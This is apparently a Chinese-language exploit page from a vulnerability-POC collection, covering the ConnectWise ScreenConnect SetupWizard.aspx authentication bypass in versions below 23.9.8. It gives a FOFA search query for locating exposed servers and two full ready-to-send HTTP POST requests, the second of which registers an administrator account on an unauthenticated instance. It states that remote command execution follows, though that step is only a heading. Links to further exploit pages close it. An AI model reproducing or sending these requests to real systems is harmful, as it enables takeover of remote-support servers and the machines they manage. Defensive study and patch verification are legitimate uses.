C2-1ConnectWise ScreenConnect-远程桌面软件-RCE

漏洞描述：

ConnectWise ScreenConnect低于23.9.8 版本的产品中，SetupWizard.aspx接口处存在身份验证漏洞，未经授权攻击者可以利用此漏洞注册账户，并登陆到产品后台进行一系列操作。而且可以通过 ScreenConnect 的原有功能进行命令执行，可导致服务器被接管的情况。

影响版本：

ScreenConnect < 23.9.8

网站图片:

网络测绘:

fofa语法：

title=“ScreenConnect Remote Support Software” || banner=“ScreenConnect” || header=“ScreenConnect”

漏洞复现:

payload

POST /SetupWizard.aspx/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=KpL8npmP2kjkV2R38RjMbcxh5fv9GX1W%2ByaPFSWMo929wX7NKdcOVnO%2B2Xy3Mjo6aMTftGCTuZOshWF%2BaK5CuAKlqKYj%2BXO2037OK3rd1mmLPyV1WyasMjnZCG%2FiycF3ZVeYskrYSZvH2QcRhz2nFILP%2FqtC0vux0Joc5bjhZAgxirJBp6d4s4Do5BXO9ZYXT0UlV6sqYl3YrsrF4Ox8FE81FgyP9a29hLd5lywkiaBtP3kZ3tKW%2BNPGYQcUM9D1Ri4elRhuXQLzBDrTT4HjtftZaBSIIVMhCVmEmLJgjGWos2IdVl7BKiQSS3Dv5m0L7oLLaTfkRk27NEsVgyHFgBxA4hjkc5tSQ9MfUe%2FOpEHjjagbh5sH11meqdmSHo7rROHMFXn3dB2ywvYB%2FYsh%2FYLi6cHIOBhXbG%2BaJ84nJepoXSA4gcaah2RHjKzIp9NWzOa7Hnm%2BHBzPPdHPmAhXOvrxnRA%2F8Tv6cYO4%2F9Q7dPMqG%2Fi8xFEba3ocazfN5Lreh7QmFJMLdO7x93pvTgC3i8k6DBcFVE08k4cOzJSAayRaoFRlt7%2FiDlCvWexznk3YmMcaLWA9r8plzn6TDfYNi3UEUNORpwo6TbteQ3480cyjozukJFmj33KzdAkl9OCUBXmnsQLWmVB6r2QJV2dlRuZM10jgcTAbvZSyNkQ69jFRFEfzradzzN54UgT%2BbQLF%2BmdEPK7kg7Ln3G3MfTpqjw6oFcAn%2BDb4DQL0ssfiz3O6AzWRaPowJnBAUwOVrl6xn2lN5AV9mW7DIe43dFyBmLtTzC77JXVlKWF2MNDYK2Zi5m%2B7LsFAHTRCWxLS%2FbZJtxr6hN3IO4HEaX6d74NS0BYlSFAwbkm8FOij3r15pMWrtvQLm53m0oAQtIHzCU3K%2FLAG0WMg18%2Bma6oOALFYqSwVJ7VyvXWclcL4UlRp17e8Ed17jqOgAWQsDwrmBZGaptTkredq%2FMZsP9oS5VNehB2WIJ0BY%2Fxg3VbVq3MdX6yAhWhCtRzzTvN0h%2Btx4aI4yE8yXRibmg948f2AdzMf7dYRWSTK2HIZPO55VEQAhROIn2AFcIgMlhqD9ovtzXHObIMNFTvGZxwKIB%2B4Tfe43oXCtEfHxsdI%2BdNKbgVmPCF%2B465CH11thoQdd3K4UtK8HL3PwEtFZxC%2FEkr2gaRF3IxxLGyzKM7lXHzBcxoe%2Bv7zMvfbxfak1eU%2BaHhgI4cfgU4Et%2B3Oht%2FT%2B5FSQ75ZxN0hM%2B8vYeaz5QRUgfn%2F5%2BJp8xfeed0B3P3zoNDjG3qG&__VIEWSTATEGENERATOR=01A6B8B5&ctl00%24Main%24wizard%24StartNavigationTemplateContainerID%24StartNextButton=Next

注册账户

POST /SetupWizard.aspx/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=SItI1qeRFLFIBvlVYL%2FKkG9MCdmfjlDluxNTrmc0TFOt8VWSyztNh7yjxZfCAohFQbk4XOV1Gl8It7doVMhEK6SvLms62VooN9NnJ6JH%2FBJciRVCQNIOag5gwTuiOUARgEbPNa3pGniY5wmRsz5gKJVl2tfqlesvVJC3YUACPuYhblOrx1fFYRd8y%2FVufo3Bf5jseEspFRSgnsFyvr8NgPP4uvZNGEEdtUz4eBUc%2FMB3EYc1uCc5h4lnOP0xvfM4X4fW4ceMudur3RVb5RTUMn%2FQCAviLGazXxbYWBFF9ieqRy1ySoDeaKUPwXF8pVvM2gWTANxxt7R1rMeUfpFEkUmKIULFtHx1N%2Bn3q5199zboK%2B%2BzDKPGb2GPFLPl9a1gmGNnFCDbauvoO1fJqVXxFM4XMnzDRMhNPqJn9rhWTZt9k%2BtctV0Zx7NLNKt%2B2AiWlqWnutxMe%2B39AXgoADovviDR2x3ExjpH8FmIERBYu7YzJGqkgXPCgX%2FAYW3XHyNmaprIm0GSDVd69HmucliNFu%2BJr3VnMevfeq3k7K%2FhKB96aSg0ZQ73soDdB8ODaPPOTlONnfqfaRbwiuvdhgl76m8sPjXTBLDNjwyJpT1jSLu3Hy0Fg3uF3zXVX%2BF0kkMcQYtgvDU011jw0%2FLh3Z7Y7zuR5gXob6R7mkJnq1yQG0SXq7Apk2%2F2Rj0CIF%2BUWufiSs%2BQo192w2IpZnVvoV3ZB7VqRP858YmMwfJF0%2F9rrONP3Efb8yNYhN%2BudYzozToEoJE6MUtb2GuwXgVpgSewqIG%2BNTRcsgeZkNfpyzy2Uqcsaq3dqr4bNv%2F45RzDbg3ntK0BkAJd2nW0MJUsLQtrqsFRmSSE0r8cjXT2L%2Fc1hPsR0wsmoyqpctMCvMNZLNrDWfR1EP90pja%2FTpMoQhgwdgTon8OdmDg9GWffoVZ7Ub%2BT6wW7fQS2K8tp%2BDGvpRM1nLVKcBsiC87DelitbYYKOF8wTOS6myL6dLQxG92cYSCmfJIANEhYAa6dqk7N1KPsWx2zO58IqweC4o5DwsKiAS%2FI0M8fKtm8WzzJwTk2RXCTPKMR%2FRq%2FN5KE4pwOGz0bai9G9hLKvkKCtjcw%2BF8h2LPXbqFNCCB%2BlwW%2FXkNQ5dFvueSIyV8qzWUufflnwsTrNWZk4Urg9j2KVzQrT1%2Brle6hpFFU1JzkjWOTDnqRxNHj74vKVk8SNZZfPktfqB6bw0jxe2I7U5lVJcr6CUNxONMU6IYS42HYli%2FYIeGqReRf5VzLFLfj1VZEJiMZmV7qCVchpgZEG73mQdpXXDwS0Q%3D%3D&__VIEWSTATEGENERATOR=01A6B8B5&ctl00%24Main%24wizard%24userNameBox=qwert&ctl00%24Main%24wizard%24emailBox=qwert%40poc.com&ctl00%24Main%24wizard%24passwordBox=admin123%21&ctl00%24Main%24wizard%24verifyPasswordBox=admin123%21&ctl00%24Main%24wizard%24StepNavigationTemplateContainerID%24StepNextButton=Next

PS：里面的账号、密码、邮箱、可自行设置

尝试登录

RCE

Menu

Share

C2-1ConnectWiseScreenConnect-远程桌面软件-RCE

C2-1ConnectWise ScreenConnect-远程桌面软件-RCE

漏洞描述：

影响版本：

网站图片:

网络测绘:

fofa语法：

漏洞复现:

Comment

Z22-1正方-移动信息服务管理系统-任意文件上传

Z20-1ZoneMinder--SQL

Z17-2紫光-电子档案管理系统-InformationLeakage

P5-2平升-电子水库监测管理平台-SQL

M3-2明源云-ERP系统接口管家-任意文件上传

Y4-21用友-NC-XXE

Y4-18用友-NC-XXE

Q14-1群杰-印章物联网管理平台-PermissionAC

J26-1极简云-网络验证系统-任意文件读取

J17-3金蝶-Apusic应用服务器-JNDI注入